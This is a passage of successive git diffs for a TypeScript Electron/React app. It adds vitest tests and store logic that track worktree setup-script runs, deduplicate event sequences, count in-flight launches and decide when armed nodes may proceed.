+  useReactFlow: () => ({ updateNodeData: vi.fn(), setNodes: vi.fn() })
+}))
+
+import { GroupNode, setWorktreeActionHandler, type WorktreeAction } from './GroupNode'
+
+;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
+
+const GROUP_ID = 'group-1'
+const RUN_KEY = 'rk'
+
+const ev = (over: Partial<ProjectSetupEvent> = {}): ProjectSetupEvent => ({
+  runKey: RUN_KEY,
+  runId: 'run-a',
+  kind: 'setup',
+  seq: 1,
+  state: 'running',
+  ...over
+})
+
+function renderGroup(): { chip: () => HTMLButtonElement | HTMLElement | null; host: HTMLDivElement } {
+  const host = document.createElement('div')
+  document.body.append(host)
+  const root = createRoot(host)
+  // Only the fields the chip path reads — NodeProps' full shape is React Flow's business, and this
+  // test mocks React Flow away entirely.
+  const props = {
+    id: GROUP_ID,
+    data: {
+      title: 'wt',
+      color: '#888',
+      worktree: { repoPath: '/repo', path: '/repo/wt', branch: 'feat', baseRef: 'main' }
+    },
+    selected: false
+  } as unknown as Parameters<typeof GroupNode>[0]
+  act(() => {
+    root.render(<GroupNode {...props} />)
+  })
+  return { chip: () => host.querySelector('.group-node__setup'), host }
+}
+
+beforeEach(() => {
+  document.body.innerHTML = ''
+  // The frame's own git-status poll wants a live session api; it has nothing to do with the chip.
+  useWorktrees.setState({ refreshStatus: async () => {} })
+  useProjectSetup.setState({ byRunKey: {}, projectRunKey: {}, groupRunKey: {}, pendingByGroup: {} })
+  setWorktreeActionHandler(null)
+})
+
+describe('the worktree frame’s setup chip', () => {
+  it('a failed setup is a BUTTON that asks Canvas to re-run it for THIS group', () => {
+    const seen: Array<[string, WorktreeAction]> = []
+    setWorktreeActionHandler((groupId, action) => seen.push([groupId, action]))
+    useProjectSetup.getState().attachGroup(GROUP_ID, RUN_KEY)
+    useProjectSetup.getState().applyEvent(ev({ state: 'failed', exitCode: 1 }))
+    const { chip } = renderGroup()
+    const button = chip() as HTMLButtonElement
+    expect(button.tagName).toBe('BUTTON')
+    expect(button.disabled).toBe(false)
+    act(() => button.click())
+    expect(seen).toEqual([[GROUP_ID, 'rerun-setup']])
+  })
+
+  it('and is DISABLED while a launch for the group is already in flight', () => {
+    setWorktreeActionHandler(() => expect.unreachable('a second launch must not be dispatched'))
+    useProjectSetup.getState().attachGroup(GROUP_ID, RUN_KEY)
+    useProjectSetup.getState().applyEvent(ev({ state: 'failed', exitCode: 1 }))
+    // The click has been made; `projectSetup.run` has not answered yet (a consent dialog may be up).
+    useProjectSetup.getState().markGroupPending(GROUP_ID)
+    const { chip } = renderGroup()
+    const button = chip() as HTMLButtonElement
+    expect(button.disabled).toBe(true)
+    expect(button.textContent).toContain('…')
+    act(() => button.click()) // a disabled button dispatches nothing — the handler above proves it
+  })
+
+  it('a running run is a plain label, not an affordance', () => {
+    useProjectSetup.getState().attachGroup(GROUP_ID, RUN_KEY)
+    useProjectSetup.getState().applyEvent(ev({ state: 'running' }))
+    const { chip } = renderGroup()
+    expect(chip()!.tagName).toBe('SPAN')
+    expect(chip()!.textContent).toContain('setup')
+  })
+
+  it('shows nothing at all for a group with no run of its own', () => {
+    const { chip } = renderGroup()
+    expect(chip()).toBeNull()
+  })
+})

--- a/src/renderer/state/projectSetup.test.ts
+++ b/src/renderer/state/projectSetup.test.ts
@@ -15,7 +15,7 @@
 // resolve through those attachments.
 import { describe, it, expect, beforeEach, vi } from 'vitest'
 import type { ProjectSetupEvent } from '@shared/project-settings'
-import { SETUP_TAIL_MAX, useProjectSetup } from './projectSetup'
+import { SETUP_TAIL_MAX, setupGateDone, useProjectSetup, type SetupRunState } from './projectSetup'
 
 const ev = (over: Partial<ProjectSetupEvent> = {}): ProjectSetupEvent => ({
   runKey: 'rk',
@@ -160,12 +160,68 @@ describe('useProjectSetup — lane attachment', () => {
     expect(useProjectSetup.getState().runForGroup('g1')!.state).toBe('failed')
   })
 
+  it('RECOVERY: re-running setup for the same GROUP re-attaches its lane and opens the gate again', () => {
+    // The frame's chip is the only re-run affordance that can do this: the settings panel's own Run
+    // executes at the project ROOT and attaches the PROJECT lane, so it can never clear a worktree
+    // group's failed run — the group would stay `failed` forever and its armed nodes with it.
+    useProjectSetup.getState().attachGroup('g1', 'rk')
+    apply(ev({ seq: 1, state: 'failed', exitCode: 1, chunk: 'npm ci exploded\n' }))
+    expect(setupGateDone(useProjectSetup.getState().runForGroup('g1'), false)).toBe(false)
+    // Chip clicked → a fresh launch for the SAME worktree. Deterministic runKey, so the ack hands
+    // back the same key; the fresh `runId` is what makes it a new run rather than a stale tail.
+    useProjectSetup.getState().attachGroup('g1', 'rk')
+    apply(ev({ runId: 'run-b', seq: 1, state: 'running' }))
+    expect(useProjectSetup.getState().runForGroup('g1')!.state).toBe('running')
+    apply(ev({ runId: 'run-b', seq: 2, state: 'done', exitCode: 0 }))
+    expect(setupGateDone(useProjectSetup.getState().runForGroup('g1'), false)).toBe(true)
+  })
+
   it('re-attaching moves a lane to the newer run', () => {
     apply(ev({ seq: 1, chunk: 'old\n' }))
     attachProject('p1', 'rk')
     apply(ev({ runKey: 'rk2', runId: 'run-b', seq: 1, chunk: 'new\n' }))
     attachProject('p1', 'rk2')
     expect(runForProject('p1')!.tail).toBe('new\n')
+  })
+})
+
+describe('setupGateDone — may a node armed on this worktree run yet?', () => {
+  const run = (state: SetupRunState['state']): SetupRunState => ({
+    runKey: 'rk',
+    runId: 'run-a',
+    kind: 'setup',
+    state,
+    tail: '',
+    seq: 1
+  })
+
+  it('is CLOSED while a launch is pending, even with nothing on record', () => {
+    // `projectSetup.run` resolves only after the consent dialog is answered — the window this flag
+    // covers is as long as the user takes to read it, not a millisecond.
+    expect(setupGateDone(undefined, true)).toBe(false)
+  })
+
+  it('stays closed while the run is still going', () => {
+    expect(setupGateDone(run('running'), false)).toBe(false)
+  })
+
+  it('stays closed on a FAILED run — a half-prepared checkout is not a prepared one', () => {
+    expect(setupGateDone(run('failed'), false)).toBe(false)
+    expect(setupGateDone(run('cancelled'), false)).toBe(false)
+  })
+
+  it('opens on done', () => {
+    expect(setupGateDone(run('done'), false)).toBe(true)
+  })
+
+  it('opens when nothing is on record and nothing is pending', () => {
+    // After an app restart the run store is empty and no event is ever coming; holding here would
+    // strand a persisted arming forever.
+    expect(setupGateDone(undefined, false)).toBe(true)
+  })
+
+  it('pending wins over a stale record of the PREVIOUS run', () => {
+    expect(setupGateDone(run('done'), true)).toBe(false)
   })
 })
 

--- a/src/renderer/state/projectSetup.test.ts
+++ b/src/renderer/state/projectSetup.test.ts
@@ -15,7 +15,13 @@
 // resolve through those attachments.
 import { describe, it, expect, beforeEach, vi } from 'vitest'
 import type { ProjectSetupEvent } from '@shared/project-settings'
-import { SETUP_TAIL_MAX, setupGateDone, useProjectSetup, type SetupRunState } from './projectSetup'
+import {
+  SETUP_TAIL_MAX,
+  setupAckDecision,
+  setupGateDone,
+  useProjectSetup,
+  type SetupRunState
+} from './projectSetup'
 
 const ev = (over: Partial<ProjectSetupEvent> = {}): ProjectSetupEvent => ({
   runKey: 'rk',
@@ -33,7 +39,7 @@ const runForProject = (projectId: string): ReturnType<typeof useProjectSetup.get
   useProjectSetup.getState().runForProject(projectId)
 
 beforeEach(() => {
-  useProjectSetup.setState({ byRunKey: {}, projectRunKey: {}, groupRunKey: {} })
+  useProjectSetup.setState({ byRunKey: {}, projectRunKey: {}, groupRunKey: {}, pendingByGroup: {} })
 })
 
 describe('useProjectSetup — folding the event stream', () => {
@@ -222,6 +228,77 @@ describe('setupGateDone — may a node armed on this worktree run yet?', () => {
 
   it('pending wins over a stale record of the PREVIOUS run', () => {
     expect(setupGateDone(run('done'), true)).toBe(false)
+  })
+})
+
+describe('setupAckDecision — what a launch ack obliges the caller to do', () => {
+  it('a started run that asks collaborators to wait KEEPS the hold, and claims the lane', () => {
+    expect(
+      setupAckDecision({ status: 'started', runKey: 'rk', runId: 'r1', waitForSetup: true })
+    ).toEqual({ attach: true, hold: 'wait' })
+  })
+
+  it('a started run that does NOT ask them to wait releases it (still claiming the lane)', () => {
+    expect(
+      setupAckDecision({ status: 'started', runKey: 'rk', runId: 'r1', waitForSetup: false })
+    ).toEqual({ attach: true, hold: 'release' })
+  })
+
+  it('nothing will prepare this checkout → release', () => {
+    for (const reason of ['no-script', 'declined', 'unanswered', 'unavailable'] as const) {
+      expect(setupAckDecision({ status: 'skipped', reason })).toEqual({
+        attach: false,
+        hold: 'release'
+      })
+    }
+  })
+
+  it('BUSY keeps the hold — this ack knows nothing about the run that is actually going', () => {
+    // The double-clicked re-run chip: the loser gets `busy` while the winner's script runs. Reading
+    // that as "nothing is happening" would open the gate over a live checkout.
+    expect(setupAckDecision({ status: 'skipped', reason: 'busy' })).toEqual({
+      attach: false,
+      hold: 'keep'
+    })
+  })
+})
+
+describe('useProjectSetup — in-flight launches per group', () => {
+  const pending = (groupId: string): number => useProjectSetup.getState().pendingForGroup(groupId)
+
+  it('DOUBLE DISPATCH: a busy ack decrements one launch and leaves the gate closed', () => {
+    const s = (): ReturnType<typeof useProjectSetup.getState> => useProjectSetup.getState()
+    // Two clicks on the re-run chip inside the consent window: two launches in flight.
+    s().markGroupPending('g1')
+    s().markGroupPending('g1')
+    expect(pending('g1')).toBe(2)
+    // The loser comes back `busy` (its caller clears exactly one).
+    s().clearGroupPending('g1')
+    expect(pending('g1')).toBe(1)
+    expect(setupGateDone(s().runForGroup('g1'), pending('g1') > 0)).toBe(false)
+    // The winner's ack lands: its run is attached and live — still closed, now on the run itself.
+    s().clearGroupPending('g1')
+    s().attachGroup('g1', 'rk')
+    apply(ev({ seq: 1, state: 'running' }))
+    expect(pending('g1')).toBe(0)
+    expect(setupGateDone(s().runForGroup('g1'), pending('g1') > 0)).toBe(false)
+    // …and only its `done` opens it.
+    apply(ev({ seq: 2, state: 'done', exitCode: 0 }))
+    expect(setupGateDone(s().runForGroup('g1'), pending('g1') > 0)).toBe(true)
+  })
+
+  it('never goes negative, and an exhausted group leaves no entry behind', () => {
+    useProjectSetup.getState().markGroupPending('g1')
+    useProjectSetup.getState().clearGroupPending('g1')
+    useProjectSetup.getState().clearGroupPending('g1')
+    expect(pending('g1')).toBe(0)
+    expect(useProjectSetup.getState().pendingByGroup.g1).toBeUndefined()
+  })
+
+  it('counts per group — one worktree’s launch never gates another’s', () => {
+    useProjectSetup.getState().markGroupPending('g1')
+    expect(pending('g1')).toBe(1)
+    expect(pending('g2')).toBe(0)
   })
 })
 

--- a/src/renderer/state/projectSetup.test.ts
+++ b/src/renderer/state/projectSetup.test.ts
@@ -145,6 +145,21 @@ describe('useProjectSetup — lane attachment', () => {
     expect(useProjectSetup.getState().runForGroup('g1')!.tail).toBe('worktree\n')
   })
 
+  it('a group lane follows its run through running → done (what the frame’s chip reads)', () => {
+    useProjectSetup.getState().attachGroup('g1', 'rk')
+    apply(ev({ seq: 1, chunk: 'npm ci\n' }))
+    expect(useProjectSetup.getState().runForGroup('g1')!.state).toBe('running')
+    apply(ev({ seq: 2, state: 'done', exitCode: 0 }))
+    const run = useProjectSetup.getState().runForGroup('g1')!
+    expect(run.state).toBe('done')
+    expect(run.exitCode).toBe(0)
+    // …and a FAILED archive run attached later replaces it, so the chip reports the newer one.
+    useProjectSetup.getState().attachGroup('g1', 'rk-archive')
+    apply(ev({ runKey: 'rk-archive', runId: 'run-c', kind: 'archive', seq: 1, state: 'failed', exitCode: 3 }))
+    expect(useProjectSetup.getState().runForGroup('g1')!.kind).toBe('archive')
+    expect(useProjectSetup.getState().runForGroup('g1')!.state).toBe('failed')
+  })
+
   it('re-attaching moves a lane to the newer run', () => {
     apply(ev({ seq: 1, chunk: 'old\n' }))
     attachProject('p1', 'rk')

--- a/src/renderer/state/projectSetup.test.ts
+++ b/src/renderer/state/projectSetup.test.ts
@@ -1,34 +1,48 @@
 // @vitest-environment jsdom
 //
-// The renderer's view of a setup/archive run. Everything here exists because the event stream is a
-// LOSSY, RE-ORDERABLE wire: `ProjectSetupEvent.seq` is monotonic per run precisely so a client can
-// tell a duplicate (relay re-delivery) from a fresh chunk, and the output of a script is unbounded
-// while the panel's box is not.
+// The renderer's view of a setup/archive run. Everything here exists because of two properties of
+// the wire:
+//
+//  - it is LOSSY AND RE-ORDERABLE. `ProjectSetupEvent.seq` is monotonic per run precisely so a
+//    client can tell a duplicate (relay re-delivery) from a fresh chunk.
+//  - `runKey` IS NOT UNIQUE OVER TIME. It is the deterministic single-flight key (kind + location),
+//    so two sequential runs of the same script share it and each restart `seq` at 1. `runId` is the
+//    per-launch identity; folding on it is what keeps run 2 from being swallowed as run 1's stale
+//    tail.
+//
+// And because an event carries no lane discriminator, storage is keyed by `runKey` alone: the
+// initiator ATTACHES its run to a project (or a worktree group) at ack time, and the selectors
+// resolve through those attachments.
 import { describe, it, expect, beforeEach, vi } from 'vitest'
 import type { ProjectSetupEvent } from '@shared/project-settings'
 import { SETUP_TAIL_MAX, useProjectSetup } from './projectSetup'
 
 const ev = (over: Partial<ProjectSetupEvent> = {}): ProjectSetupEvent => ({
-  runKey: 'r1',
+  runKey: 'rk',
+  runId: 'run-a',
   kind: 'setup',
   seq: 1,
   state: 'running',
   ...over
 })
 
-const apply = (e: ProjectSetupEvent, groupId?: string): void =>
-  useProjectSetup.getState().applyEvent('p1', e, groupId)
+const apply = (e: ProjectSetupEvent): void => useProjectSetup.getState().applyEvent(e)
+const attachProject = (projectId: string, runKey: string): void =>
+  useProjectSetup.getState().attachProject(projectId, runKey)
+const runForProject = (projectId: string): ReturnType<typeof useProjectSetup.getState>['byRunKey'][string] =>
+  useProjectSetup.getState().runForProject(projectId)
 
 beforeEach(() => {
-  useProjectSetup.setState({ byProject: {}, byGroup: {} })
+  useProjectSetup.setState({ byRunKey: {}, projectRunKey: {}, groupRunKey: {} })
 })
 
-describe('useProjectSetup', () => {
+describe('useProjectSetup — folding the event stream', () => {
   it('opens a run entry from the first event and appends chunks in seq order', () => {
     apply(ev({ seq: 1, chunk: 'installing…\n' }))
     apply(ev({ seq: 2, chunk: 'done\n' }))
-    const run = useProjectSetup.getState().byProject.p1!
-    expect(run.runKey).toBe('r1')
+    const run = useProjectSetup.getState().byRunKey.rk!
+    expect(run.runKey).toBe('rk')
+    expect(run.runId).toBe('run-a')
     expect(run.kind).toBe('setup')
     expect(run.state).toBe('running')
     expect(run.tail).toBe('installing…\ndone\n')
@@ -38,7 +52,7 @@ describe('useProjectSetup', () => {
     apply(ev({ seq: 1, chunk: 'a' }))
     apply(ev({ seq: 2, chunk: 'b' }))
     apply(ev({ seq: 2, chunk: 'b' }))
-    expect(useProjectSetup.getState().byProject.p1!.tail).toBe('ab')
+    expect(useProjectSetup.getState().byRunKey.rk!.tail).toBe('ab')
   })
 
   it('drops a STALE seq that arrives after a newer one', () => {
@@ -47,7 +61,7 @@ describe('useProjectSetup', () => {
     // seq 2 lost the race; re-inserting it here would put the output out of order AND would let a
     // stale `running` overwrite a terminal state.
     apply(ev({ seq: 2, chunk: 'b', state: 'done', exitCode: 0 }))
-    const run = useProjectSetup.getState().byProject.p1!
+    const run = useProjectSetup.getState().byRunKey.rk!
     expect(run.tail).toBe('ac')
     expect(run.state).toBe('running')
     expect(run.exitCode).toBeUndefined()
@@ -56,7 +70,7 @@ describe('useProjectSetup', () => {
   it('caps the tail at 8 KB, keeping the END (the failure is at the bottom, not the top)', () => {
     apply(ev({ seq: 1, chunk: 'x'.repeat(SETUP_TAIL_MAX) }))
     apply(ev({ seq: 2, chunk: 'TAIL' }))
-    const { tail } = useProjectSetup.getState().byProject.p1!
+    const { tail } = useProjectSetup.getState().byRunKey.rk!
     expect(tail.length).toBe(SETUP_TAIL_MAX)
     expect(tail.endsWith('TAIL')).toBe(true)
     expect(tail.startsWith('x')).toBe(true)
@@ -64,41 +78,84 @@ describe('useProjectSetup', () => {
 
   it('caps a single over-long chunk too', () => {
     apply(ev({ seq: 1, chunk: 'y'.repeat(SETUP_TAIL_MAX * 3) }))
-    expect(useProjectSetup.getState().byProject.p1!.tail.length).toBe(SETUP_TAIL_MAX)
+    expect(useProjectSetup.getState().byRunKey.rk!.tail.length).toBe(SETUP_TAIL_MAX)
   })
 
   it('records the terminal state and exit code', () => {
     apply(ev({ seq: 1, chunk: 'boom\n' }))
     apply(ev({ seq: 2, state: 'failed', exitCode: 2 }))
-    const run = useProjectSetup.getState().byProject.p1!
+    const run = useProjectSetup.getState().byRunKey.rk!
     expect(run.state).toBe('failed')
     expect(run.exitCode).toBe(2)
     expect(run.tail).toBe('boom\n')
   })
 
-  it('a NEW runKey starts a fresh entry — the previous run’s output never bleeds into it', () => {
+  it('a NEW runKey is its own entry — one project’s setup and archive never share a slot', () => {
+    apply(ev({ seq: 1, chunk: 'setup output\n' }))
+    apply(ev({ runKey: 'rk-archive', runId: 'run-b', kind: 'archive', seq: 1, chunk: 'archive output\n' }))
+    expect(useProjectSetup.getState().byRunKey.rk!.tail).toBe('setup output\n')
+    expect(useProjectSetup.getState().byRunKey['rk-archive']!.tail).toBe('archive output\n')
+  })
+
+  it('C1: a SECOND run under the SAME runKey (new runId) starts fresh — seq restarting at 1 is not stale', () => {
     apply(ev({ seq: 1, chunk: 'first run\n' }))
-    apply(ev({ seq: 2, state: 'done', exitCode: 0 }))
-    apply(ev({ runKey: 'r2', kind: 'archive', seq: 1, chunk: 'second\n' }))
-    const run = useProjectSetup.getState().byProject.p1!
-    expect(run.runKey).toBe('r2')
-    expect(run.kind).toBe('archive')
+    apply(ev({ seq: 2, state: 'failed', exitCode: 1 }))
+    // The user hits Run again. Same script, same location ⇒ the SAME deterministic runKey, and the
+    // service's seq counter starts over. Folding on runKey+seq alone would drop every one of these
+    // as stale and leave the failed badge standing over a live run.
+    apply(ev({ runId: 'run-b', seq: 1, chunk: 'second run\n' }))
+    const run = useProjectSetup.getState().byRunKey.rk!
+    expect(run.runId).toBe('run-b')
     expect(run.state).toBe('running')
-    expect(run.tail).toBe('second\n')
+    expect(run.tail).toBe('second run\n')
     expect(run.exitCode).toBeUndefined()
+    expect(run.seq).toBe(1)
   })
 
-  it('routes a worktree run to byGroup, leaving the project entry alone', () => {
+  it('and the fresh entry then dedupes on its OWN seq', () => {
+    apply(ev({ seq: 1, chunk: 'first\n' }))
+    apply(ev({ runId: 'run-b', seq: 1, chunk: 'second\n' }))
+    apply(ev({ runId: 'run-b', seq: 1, chunk: 'second\n' }))
+    expect(useProjectSetup.getState().byRunKey.rk!.tail).toBe('second\n')
+  })
+})
+
+describe('useProjectSetup — lane attachment', () => {
+  it('records an event for a runKey nobody has attached yet', () => {
+    // The ack and the first event race; the attachment may land a tick later, and the head of the
+    // output must survive that.
+    apply(ev({ seq: 1, chunk: 'early\n' }))
+    expect(runForProject('p1')).toBeUndefined()
+    attachProject('p1', 'rk')
+    expect(runForProject('p1')!.tail).toBe('early\n')
+  })
+
+  it('does NOT surface an unattached run in a project’s lane', () => {
+    apply(ev({ runKey: 'someone-elses', runId: 'run-z', seq: 1, chunk: 'not mine\n' }))
+    attachProject('p1', 'rk')
+    expect(runForProject('p1')).toBeUndefined()
+  })
+
+  it('routes a worktree run through attachGroup, independently of the project lane', () => {
+    attachProject('p1', 'rk')
+    useProjectSetup.getState().attachGroup('g1', 'rk-worktree')
     apply(ev({ seq: 1, chunk: 'project\n' }))
-    apply(ev({ runKey: 'r9', seq: 1, chunk: 'group\n' }), 'g1')
-    expect(useProjectSetup.getState().byProject.p1!.tail).toBe('project\n')
-    expect(useProjectSetup.getState().byGroup.g1!.tail).toBe('group\n')
-    // …and the two dedupe independently: same seq, different lane.
-    apply(ev({ runKey: 'r9', seq: 2, chunk: 'more\n' }), 'g1')
-    expect(useProjectSetup.getState().byGroup.g1!.tail).toBe('group\nmore\n')
+    apply(ev({ runKey: 'rk-worktree', runId: 'run-w', seq: 1, chunk: 'worktree\n' }))
+    expect(runForProject('p1')!.tail).toBe('project\n')
+    expect(useProjectSetup.getState().runForGroup('g1')!.tail).toBe('worktree\n')
   })
 
-  it('subscribeProject wires api.projectSetup.onEvent into applyEvent and returns its unsubscribe', () => {
+  it('re-attaching moves a lane to the newer run', () => {
+    apply(ev({ seq: 1, chunk: 'old\n' }))
+    attachProject('p1', 'rk')
+    apply(ev({ runKey: 'rk2', runId: 'run-b', seq: 1, chunk: 'new\n' }))
+    attachProject('p1', 'rk2')
+    expect(runForProject('p1')!.tail).toBe('new\n')
+  })
+})
+
+describe('useProjectSetup — subscription', () => {
+  it('wires api.projectSetup.onEvent into applyEvent and returns its unsubscribe', () => {
     let emit: ((e: ProjectSetupEvent) => void) | null = null
     const off = vi.fn()
     const onEvent = vi.fn((_projectId: string, cb: (e: ProjectSetupEvent) => void) => {
@@ -109,7 +166,7 @@ describe('useProjectSetup', () => {
     const unsubscribe = useProjectSetup.getState().subscribeProject('p1')
     expect(onEvent).toHaveBeenCalledWith('p1', expect.any(Function))
     emit!(ev({ seq: 1, chunk: 'from the wire' }))
-    expect(useProjectSetup.getState().byProject.p1!.tail).toBe('from the wire')
+    expect(useProjectSetup.getState().byRunKey.rk!.tail).toBe('from the wire')
     unsubscribe()
     expect(off).toHaveBeenCalledTimes(1)
   })

--- a/src/renderer/state/projectSetup.test.ts
+++ b/src/renderer/state/projectSetup.test.ts
@@ -1,0 +1,116 @@
+// @vitest-environment jsdom
+//
+// The renderer's view of a setup/archive run. Everything here exists because the event stream is a
+// LOSSY, RE-ORDERABLE wire: `ProjectSetupEvent.seq` is monotonic per run precisely so a client can
+// tell a duplicate (relay re-delivery) from a fresh chunk, and the output of a script is unbounded
+// while the panel's box is not.
+import { describe, it, expect, beforeEach, vi } from 'vitest'
+import type { ProjectSetupEvent } from '@shared/project-settings'
+import { SETUP_TAIL_MAX, useProjectSetup } from './projectSetup'
+
+const ev = (over: Partial<ProjectSetupEvent> = {}): ProjectSetupEvent => ({
+  runKey: 'r1',
+  kind: 'setup',
+  seq: 1,
+  state: 'running',
+  ...over
+})
+
+const apply = (e: ProjectSetupEvent, groupId?: string): void =>
+  useProjectSetup.getState().applyEvent('p1', e, groupId)
+
+beforeEach(() => {
+  useProjectSetup.setState({ byProject: {}, byGroup: {} })
+})
+
+describe('useProjectSetup', () => {
+  it('opens a run entry from the first event and appends chunks in seq order', () => {
+    apply(ev({ seq: 1, chunk: 'installing…\n' }))
+    apply(ev({ seq: 2, chunk: 'done\n' }))
+    const run = useProjectSetup.getState().byProject.p1!
+    expect(run.runKey).toBe('r1')
+    expect(run.kind).toBe('setup')
+    expect(run.state).toBe('running')
+    expect(run.tail).toBe('installing…\ndone\n')
+  })
+
+  it('drops a DUPLICATE seq — a re-delivered event must not double the output', () => {
+    apply(ev({ seq: 1, chunk: 'a' }))
+    apply(ev({ seq: 2, chunk: 'b' }))
+    apply(ev({ seq: 2, chunk: 'b' }))
+    expect(useProjectSetup.getState().byProject.p1!.tail).toBe('ab')
+  })
+
+  it('drops a STALE seq that arrives after a newer one', () => {
+    apply(ev({ seq: 1, chunk: 'a' }))
+    apply(ev({ seq: 3, chunk: 'c' }))
+    // seq 2 lost the race; re-inserting it here would put the output out of order AND would let a
+    // stale `running` overwrite a terminal state.
+    apply(ev({ seq: 2, chunk: 'b', state: 'done', exitCode: 0 }))
+    const run = useProjectSetup.getState().byProject.p1!
+    expect(run.tail).toBe('ac')
+    expect(run.state).toBe('running')
+    expect(run.exitCode).toBeUndefined()
+  })
+
+  it('caps the tail at 8 KB, keeping the END (the failure is at the bottom, not the top)', () => {
+    apply(ev({ seq: 1, chunk: 'x'.repeat(SETUP_TAIL_MAX) }))
+    apply(ev({ seq: 2, chunk: 'TAIL' }))
+    const { tail } = useProjectSetup.getState().byProject.p1!
+    expect(tail.length).toBe(SETUP_TAIL_MAX)
+    expect(tail.endsWith('TAIL')).toBe(true)
+    expect(tail.startsWith('x')).toBe(true)
+  })
+
+  it('caps a single over-long chunk too', () => {
+    apply(ev({ seq: 1, chunk: 'y'.repeat(SETUP_TAIL_MAX * 3) }))
+    expect(useProjectSetup.getState().byProject.p1!.tail.length).toBe(SETUP_TAIL_MAX)
+  })
+
+  it('records the terminal state and exit code', () => {
+    apply(ev({ seq: 1, chunk: 'boom\n' }))
+    apply(ev({ seq: 2, state: 'failed', exitCode: 2 }))
+    const run = useProjectSetup.getState().byProject.p1!
+    expect(run.state).toBe('failed')
+    expect(run.exitCode).toBe(2)
+    expect(run.tail).toBe('boom\n')
+  })
+
+  it('a NEW runKey starts a fresh entry — the previous run’s output never bleeds into it', () => {
+    apply(ev({ seq: 1, chunk: 'first run\n' }))
+    apply(ev({ seq: 2, state: 'done', exitCode: 0 }))
+    apply(ev({ runKey: 'r2', kind: 'archive', seq: 1, chunk: 'second\n' }))
+    const run = useProjectSetup.getState().byProject.p1!
+    expect(run.runKey).toBe('r2')
+    expect(run.kind).toBe('archive')
+    expect(run.state).toBe('running')
+    expect(run.tail).toBe('second\n')
+    expect(run.exitCode).toBeUndefined()
+  })
+
+  it('routes a worktree run to byGroup, leaving the project entry alone', () => {
+    apply(ev({ seq: 1, chunk: 'project\n' }))
+    apply(ev({ runKey: 'r9', seq: 1, chunk: 'group\n' }), 'g1')
+    expect(useProjectSetup.getState().byProject.p1!.tail).toBe('project\n')
+    expect(useProjectSetup.getState().byGroup.g1!.tail).toBe('group\n')
+    // …and the two dedupe independently: same seq, different lane.
+    apply(ev({ runKey: 'r9', seq: 2, chunk: 'more\n' }), 'g1')
+    expect(useProjectSetup.getState().byGroup.g1!.tail).toBe('group\nmore\n')
+  })
+
+  it('subscribeProject wires api.projectSetup.onEvent into applyEvent and returns its unsubscribe', () => {
+    let emit: ((e: ProjectSetupEvent) => void) | null = null
+    const off = vi.fn()
+    const onEvent = vi.fn((_projectId: string, cb: (e: ProjectSetupEvent) => void) => {
+      emit = cb
+      return off
+    })
+    ;(window as unknown as { nodeTerminal: unknown }).nodeTerminal = { projectSetup: { onEvent } }
+    const unsubscribe = useProjectSetup.getState().subscribeProject('p1')
+    expect(onEvent).toHaveBeenCalledWith('p1', expect.any(Function))
+    emit!(ev({ seq: 1, chunk: 'from the wire' }))
+    expect(useProjectSetup.getState().byProject.p1!.tail).toBe('from the wire')
+    unsubscribe()
+    expect(off).toHaveBeenCalledTimes(1)
+  })
+})

--- a/src/renderer/state/projectSetup.ts
+++ b/src/renderer/state/projectSetup.ts
@@ -1,5 +1,9 @@
 import { create } from 'zustand'
-import type { ProjectSetupEvent, ProjectSetupKind } from '@shared/project-settings'
+import type {
+  ProjectSetupEvent,
+  ProjectSetupKind,
+  ProjectSetupRunResult
+} from '@shared/project-settings'
 
 /**
  * Renderer view of the setup/archive runs main is streaming (`ProjectSetupEvent` on
@@ -54,13 +58,29 @@ interface ProjectSetupState {
   projectRunKey: Record<string, string | undefined>
   /** groupId -> the runKey that worktree's launch claimed (Task 5). */
   groupRunKey: Record<string, string | undefined>
+  /**
+   * groupId -> how many setup launches for it are IN FLIGHT (requested, not yet acked). Runtime-only
+   * and never persisted — like the runs themselves, it is rebuilt from what this app instance did.
+   *
+   * A COUNTER, not a flag, because the launches can overlap: `projectSetup.run` resolves only after
+   * the consent dialog is answered, and the chip that re-runs a failed setup can be clicked twice
+   * inside that window. With a flag, the loser's `busy` ack would clear the marker while the
+   * winner's script is genuinely running, and the gate would open over a live checkout.
+   */
+  pendingByGroup: Record<string, number>
   /** Fold one event into `byRunKey`. Takes no lane: the lanes come from the attachments. */
   applyEvent(ev: ProjectSetupEvent): void
   /** Called by the initiator with the runKey main acknowledged. */
   attachProject(projectId: string, runKey: string): void
   attachGroup(groupId: string, runKey: string): void
+  /** Called immediately BEFORE a `projectSetup.run` for this group is invoked. */
+  markGroupPending(groupId: string): void
+  /** Called on EVERY ack path of that invoke — started, skipped (busy included), and rejection. */
+  clearGroupPending(groupId: string): void
   runForProject(projectId: string): SetupRunState | undefined
   runForGroup(groupId: string): SetupRunState | undefined
+  /** How many launches for this group are still un-acked. */
+  pendingForGroup(groupId: string): number
   /** Wire this project's event channel into `applyEvent`; returns the unsubscribe. The preload api
    *  ref-counts subscribe/unsubscribe per project (boardLog.onChanged's shape), so several callers
    *  may hold one at once. */
@@ -87,6 +107,34 @@ interface ProjectSetupState {
 export function setupGateDone(run: SetupRunState | undefined, pending: boolean): boolean {
   if (pending) return false
   return !run || run.state === 'done'
+}
+
+/**
+ * What a worktree setup launch's ACK obliges its caller to do, as a pure decision so the one case
+ * that is easy to get wrong is pinned by tests rather than by reading the call site.
+ *
+ * `hold` is about nodes this group armed while the launch was in flight:
+ *  - `wait`    — the run started and the project asked collaborators to wait. Keep holding.
+ *  - `release` — nothing is going to prepare this checkout (no script, the user declined, the
+ *                location is unavailable), or the project runs its script unblocked. Nodes armed
+ *                during the in-flight window must be let go, or they would hold for a `done` that
+ *                either is not coming or was never meant to gate them.
+ *  - `keep`    — `busy`: ANOTHER invocation of this same run is in flight or executing right now
+ *                (a double-clicked re-run chip, most likely). This ack knows nothing about that
+ *                run's outcome, and releasing on it would open the gate over a live script. The
+ *                owning invocation's own ack, and the run's events, decide.
+ */
+export interface SetupAckDecision {
+  /** Claim the group's lane with the acked runKey (only a `started` ack has one). */
+  attach: boolean
+  hold: 'wait' | 'release' | 'keep'
+}
+
+export function setupAckDecision(res: ProjectSetupRunResult): SetupAckDecision {
+  if (res.status === 'started') {
+    return { attach: true, hold: res.waitForSetup ? 'wait' : 'release' }
+  }
+  return { attach: false, hold: res.reason === 'busy' ? 'keep' : 'release' }
 }
 
 /** Appends `chunk` and keeps only the last `SETUP_TAIL_MAX` characters. */
@@ -134,6 +182,7 @@ export const useProjectSetup = create<ProjectSetupState>((set, get) => ({
   byRunKey: {},
   projectRunKey: {},
   groupRunKey: {},
